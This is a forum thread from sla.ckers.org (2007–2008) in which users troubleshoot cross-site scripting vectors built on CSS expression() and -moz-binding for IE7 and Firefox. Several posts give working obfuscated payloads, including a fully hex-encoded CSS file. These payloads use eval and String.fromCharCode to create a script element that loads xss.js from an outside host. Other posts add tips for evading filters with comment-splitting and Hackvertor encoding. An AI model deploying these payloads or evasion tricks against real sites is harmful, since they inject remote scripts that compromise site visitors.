Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
expression: doesn't work in IE?
Posted by: mpcidm
Date: November 27, 2007 07:45PM

Hey guys, I'm trying to run this code (http://pastebin.com/f62d771e8), but I can't get it to work in IE7. What am I doing wrong? I need to use the img STYLE, with the "width:expression()" (can't use any other method on this website). With just "width:expression()" I can only do one statement, otherwise nothing happens. I need to execute multiple statements, as in the code.

As I don't have access to a box with IE7 anymore, it'd be great if you could test any code yourself, and make sure no security dialogs pop-up during execution.

Any help appreciated. Thanks!

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: November 28, 2007 03:53AM

Yes it does.

Read this post by Martin, it may help:-
http://the-mice.co.uk/switch/?p=39

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Martin
Date: December 02, 2007 04:49AM

You can actually bind to anything:expression() - I normally use xx:expression

The trick for multiple statements is to use an eval:

style=”xx: expression((window.r!=1) ? eval(’x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,ETC));document.getElementById(x(99,104,101,109,45,110,97,118,45,102,111,114,117,109)).appendChild(scr);window.r=1;’) : 1);

Here's an example from the post that Gareth mentioned. You need to decode/change the listed numbers to actual useful values to embed the <script> tag. Gareth's Hackvertor will help you construct a working string or this.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: DoctorDan
Date: December 09, 2007 02:51PM

I have a question...
did I come up with the window.r / ternary operator idea? I first posted it here at http://sla.ckers.org/forum/read.php?2,15812,page=1 , but I'm not sure if it was seen anywhere else beforehand. Because I always see the r variable used as I posted it, I think I may actually have contributed something here :P

Sorry, just wondering...
-Dan

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: December 09, 2007 03:57PM

@DoctorDan

If you were the first then I'm sorry I should have provided you with credit.
It wasn't deliberate, we're all friends here. I'll credit you on my blog as well.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Martin
Date: December 10, 2007 03:26AM

@DoctorDan

My apologies also - it's such a good tip that I saved it at the time and then completely forgot where it came from!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: December 10, 2007 03:53AM

@DoctorDan

I've updated my post on ultimate XSS CSS injection with credit for you:-
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/

Please let me know if you have a blog and I'll add a link too

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: DoctorDan
Date: December 10, 2007 05:07PM

@ Gareth Heyes and Martin

Wow! Thanks for the responses Gareth and Martin! Definitely no need for apologies or anything. I'm just glad that I could contribute something. This community basically kicks ass.

-Dan

I left comments your blogs, too. The progression/creation of that CSS injection is awesome.

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: December 11, 2007 12:50AM

Hey no probs Dan we're sorry to have missed the credit the first time, great work it was a very good tip :) Yeah you're right this forum kicks ass!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: noconnexion
Date: January 20, 2008 01:31PM

Based on The Spanner - Ultimate XSS CSS injection by Gareth Heyes I would like to use his xss css injection through a css file. This may sound like a simple task but I had alot of trouble making this work for IE70.

I've tried to explain this pretty well here hxxp://noconnexion.wordpress.com/ but I guess I was ignored because of my noob question so I've decided to try to steal 5 min from someone's time on this forum.

Let's get to the point. Like stated I would like to have this 3 files work toghether on IE7.

test.html
--------------------------------------
<html>
<body>

<link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">-- Test --</div>

</body>
</html>
--------------------------------------

test.css - and I'm pretty sure this where I need to work on
--------------------------------------
div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x27&#x29 : 1);
}
---------------------------------------

and xss.js witch need nothing to be done and it's located here: hxxp://businessinfo.co.uk/labs/xss/xss.js

The "source code" before it was "hackvectoreted" I guess is this one:

\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;') : 1);

Have to mention that I have tried to include the css with @import and same result but I'm pretty sure this is not the point. The above files work on FF but not in IE7.
Can someone give me an answer ? PLEASE.

Ty.

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: riahmatic
Date: January 21, 2008 01:31AM

@noconnexion
I think the backslashes in e\xp\re\s\s\i\o\n are breaking the vector in IE. Instead of backslashes you could use comments in it like: expres/**/sion. You could place /*woohoocomment*/ between every char if you wanted and it'd still work.

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: January 21, 2008 03:42AM

@noconnexion

Sorry for the delay in getting back to you but I didn't have much time. I've finally got my hands on a crappy windoze box (I'm defo gonna get a VM going in future) and I've successfully tested both an external style sheet and a inline style on both browsers.

Inline:-
http://www.businessinfo.co.uk/labs/ultimate_xss_css/ultimate_xss_css1.php

Stylesheet:
http://www.businessinfo.co.uk/labs/ultimate_xss_css/ultimate_xss_css2.php

I've also updated Hackvertor to make it easier to create these vectors:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBtb3piaW5kaW5nZXhwcmVzc2lvbj55b3VydXJsLmpzPEAvbW96YmluZGluZ2V4cHJlc3Npb24%2B

You can use Hackvertor to encode the styles further but I'll leave that up to you to experiment. Hope that helps

*NOTE* Firefox + Noscript silently disables mozbinding

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: noconnexion
Date: January 21, 2008 06:03PM

@riahmatic - Thanks for the reply and I understand what you mean but this doesn't work either. Tried before only expression and I think it's equal to e\xp\re\s\s\i\o\n or expres/**/sion at least in this case.

@Gareth Heyes - I appreciate that you have answered but I guess I'm either dumb or blind as I cannot see any .css file in your examples. As stated earlier "I would like to have this 3 files work toghether on IE7." test.hmtl , test.css , xss.js. And if you are going to say that I need to take what's between <div style=" THIS " id="inject"> and place it into the .css file like I did earlier here div#inject { THIS } please don't as I've done that many many times and it won't work. Or maybe is something I miss here and if it's like that I appologise in advance.

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: Gareth Heyes
Date: January 21, 2008 06:41PM

@noconnexion

The second example separates the style and HTML so it would be possible to use an external CSS file instead of the <style> tags. I didn't provide that because it's pretty easy to sort out.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: expression: doesn't work in IE?
Posted by: noconnexion
Date: January 21, 2008 08:17PM

Finally YES.

My mistake was in how I've inported the .css into the HTML

I used <link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">-- Test --</div> to import the .css

instead of

<style type="text/css">
@import url(http://www.example.com/css/last.css);
</style>

I guess it will still need to be hackvectorized even in the .css because of filters right ?

Anyway, thanks for your support and I think I'll stick around here cuz I really like the stuff in here ... maybe I can really contribute some day.

Options: ReplyQuote


Sorry, only registered users may post in this forum.